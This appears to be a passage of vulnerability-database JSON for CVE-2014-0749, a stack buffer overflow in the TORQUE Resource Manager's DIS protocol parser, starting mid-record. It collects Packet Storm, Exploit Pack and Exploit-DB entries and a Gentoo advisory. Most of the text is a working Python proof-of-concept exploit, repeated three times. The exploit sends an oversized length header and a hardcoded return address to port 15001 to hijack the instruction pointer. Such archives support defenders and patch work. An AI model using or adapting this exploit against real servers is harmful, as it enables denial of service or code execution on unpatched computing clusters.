May 2014 \n# Exploit Author: bwall - @botnet_hunter \n# Vulnerability discovered by: MWR Labs \n# CVE: CVE-2014-0749 \n# Vendor Homepage: http://www.adaptivecomputing.com/ \n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/ \n# Version: 2.5.13 \n# Tested on: Manjaro x64 \n# Description: \n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that \n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the \n# data, the next digits are the actual size of the buffer. \n# \n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system \n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be \n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()' \n \nimport socket \n \n \nip = \"172.16.246.177\" \nport = 15001 \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((ip, port)) \n \noffset = 143 \nheader = str(len(str(offset))) + str(offset) + '1' \n \npacket = header \npacket += \"\\x00\" * (140 - len(packet)) \npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build \n \ns.sendall(packet) \ndata = s.recv(1024) \ns.close() \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126855/torquerm-overflow.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nTORQUE Resource Manager 2.5.x 2.5.13 - Stack Buffer Overflow Stub", "cvss3": {}, "published": "2014-05-28T00:00:00", "type": "exploitpack", "title": "TORQUE Resource Manager 2.5.x 2.5.13 - Stack Buffer Overflow Stub", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-28T00:00:00", "id": "EXPLOITPACK:8FB219FFE4B8AEECDED9BDABBBAC76ED", "href": "", "sourceData": "#!/usr/bin/env python\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\n# Date: 27 May 2014\n# Exploit Author: bwall - @botnet_hunter\n# Vulnerability discovered by: MWR Labs\n# CVE: CVE-2014-0749\n# Vendor Homepage: http://www.adaptivecomputing.com/\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\n# Version: 2.5.13\n# Tested on: Manjaro x64\n# Description:\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\n# data, the next digits are the actual size of the buffer.\n#\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'\n\nimport socket\n\n\nip = \"172.16.246.177\"\nport = 15001\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((ip, port))\n\noffset = 143\nheader = str(len(str(offset))) + str(offset) + '1'\n\npacket = header\npacket += \"\\x00\" * (140 - len(packet))\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\n\ns.sendall(packet)\ndata = s.recv(1024)\ns.close()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-22T02:54:34", "description": "", "cvss3": {}, "published": "2014-05-28T00:00:00", "type": "exploitdb", "title": "TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2014-0749", "CVE-2014-0749"], "modified": "2014-05-28T00:00:00", "id": "EDB-ID:33554", "href": "https://www.exploit-db.com/exploits/33554", "sourceData": "#!/usr/bin/env python\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\n# Date: 27 May 2014\n# Exploit Author: bwall - @botnet_hunter\n# Vulnerability discovered by: MWR Labs\n# CVE: CVE-2014-0749\n# Vendor Homepage: http://www.adaptivecomputing.com/\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\n# Version: 2.5.13\n# Tested on: Manjaro x64\n# Description:\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\n# data, the next digits are the actual size of the buffer.\n#\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'\n\nimport socket\n\n\nip = \"172.16.246.177\"\nport = 15001\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((ip, port))\n\noffset = 143\nheader = str(len(str(offset))) + str(offset) + '1'\n\npacket = header\npacket += \"\\x00\" * (140 - len(packet))\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\n\ns.sendall(packet)\ndata = s.recv(1024)\ns.close()", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/remote/33554.py", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-25T17:23:54", "description": "### Background\n\nTORQUE is a resource manager and queuing system based on OpenPBS.\n\n### Description\n\nMultiple vulnerabilities have been discovered in TORQUE Resource Manager. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll TORQUE Resource Manager 4.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-cluster/torque-4.1.7\"\n \n\nAll TORQUE Resource Manager 2.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-cluster/torque-2.5.13\"\n \n\nNOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them.", "cvss3": {}, "published": "2014-12-26T00:00:00", "type": "gentoo", "title": "TORQUE Resource Manager: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2193", "CVE-2011-2907", "CVE-2011-4925", "CVE-2013-4319", "CVE-2013-4495", "CVE-2014-0749"], "modified": "2014-12-26T00:00:00", "id": "GLSA-201412-47", "href": "https://security.gentoo.org/glsa/201412-47", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2014-0749
